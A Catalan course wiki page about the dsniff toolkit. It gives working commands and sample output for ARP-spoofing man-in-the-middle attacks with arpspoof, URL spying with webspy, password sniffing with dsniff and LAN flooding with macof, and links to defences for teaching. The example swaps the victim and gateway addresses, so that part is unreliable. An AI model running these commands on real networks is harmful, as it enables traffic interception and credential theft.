IMPORTANT: Per accedir als fitxer de subversion: http://acacha.org/svn (sense password). Poc a poc s'aniran migrant els enllaços. Encara però funciona el subversion de la farga però no se sap fins quan... (usuari: prova i la paraula de pas 123456)

Alert.png Aquesta wiki forma part dels materials d'un curs
Curs: SeguretatXarxesInformàtiques
Fitxers: EinesHacking.pdf (EinesHacking.odp)
Repositori SVN: https://anonymous@svn.projectes.lafarga.cat/svn/iceupc/SeguretatXarxesInformàtiques
Usuari: anonymous
Paraula de pas: sense paraula de pas
Autors: Sergi Tur Badenas

Instal·lació

$ arpspoof
El programa «arpspoof» no està instal·lat actualment.  Podeu instal·lar-lo si escriviu:
sudo apt-get install dsniff
bash: arpspoof: command not found

$ sudo apt-get install dsniff

Comandes

$ dpkg -L dsniff | grep bin
/usr/sbin
/usr/sbin/arpspoof
/usr/sbin/dnsspoof
/usr/sbin/dsniff
/usr/sbin/filesnarf
/usr/sbin/macof
/usr/sbin/mailsnarf
/usr/sbin/msgsnarf
/usr/sbin/sshmitm
/usr/sbin/sshow
/usr/sbin/tcpkill
/usr/sbin/tcpnice
/usr/sbin/urlsnarf
/usr/sbin/webmitm
/usr/sbin/webspy

arpspoof

Permet realitzar una atac ARP-Spoofing. Suposant la següent distribució de màquines:

ARPSpoofingDiagram.png
  • Màquina víctima: 192.168.12.1
  • Gateway: 192.168.12.20
  • Ip de l'atacant: 192.168.12.188

Cal seguir dues passes:

1. Fer creure a la màquina víctima que som el gateway de la xarxa:

$ sudo arpspoof -t victim gateway

Per exemple:

$ sudo arpspoof -t 192.168.12.20 192.168.12.1 2> /dev/null &

La redirecció a /dev/null i l'execució en foreground es per tal de poder executar les comandes en la mateixa terminal.

2. Fer

In a seperate shell we start the matching command to fool gateway to belive we are victim.

 $ sudo arpspoof -t gateway victim

Per exemple:

$ sudo arpspoof -t 192.168.12.1 192.168.12.20 2> /dev/null &

Quant acabem podem matar els processos que provoquen l'atac amb:

$ sudo killall arpspoof

El resultat és la següent taula arp en la víctima:

$ arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.12.1             ether   00:1E:8C:A8:C7:55   C                     eth10
192.168.12.188           ether   00:1E:8C:A8:C7:55   C                     eth10

On

00:1E:8C:A8:C7:55

és la MAC de l'atacant.

Quan abans:

$ arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.12.1             ether   00:0D:88:CC:B4:67   C

webspy

Mostra les URL que esta visitant la màquina atacada:

$ sudo webspy -i eth0 192.168.12.20
webspy: listening on eth0
openURL(http://88.221.222.48/)
openURL(http://88.221.222.48/portal/catala/index4.html)

Recursos:

dsniff

Sniffer de contrasenyes. Un cop iniciat l'atac ARP podem començar a obtenir contrasenyes amb:

$ sudo dsniff -i eth0
dsniff: listening on eth0
-----------------
10/08/08 20:12:24 tcp unamaquina.local.52128 -> 203.199.219.62.dynamic.jazztel.es.80 (http)
GET / HTTP/1.1
Host: unhost.dyndns.org
Authorization: Basic cHJvdmE6cHJvdmE= [prova:prova]

Vegeu HTTP_Basic_Authentication#Implementaci.C3.B3_amb_PHP per veure un exemple de com crear un servidor PHP simple que demani autenticació bàsica per PHP:

$ wget https://gist.githubusercontent.com/acacha/5ba1f028e40732c496b6d48bd81d092f/raw/0ab0bc2b632d38699926a1502da17e22d8564eba/basicauth.php
$ php -S localhost:8080

I demaneu la URL:

http://localhost:8080/basicauth.php

macof

Segons el manual:

macof - flood a switched LAN with random MAC addresses

És a dir, pot deixar una xarxa LAN inservible.

Recursos:

Solucions contra els atacs

Consulteu:

Ettercap#Defenses_contra_ettercap_i_els_atacs_de_ARP-SPOOFING
ARP-spoofing#Solucions

Vegeu també

Recursos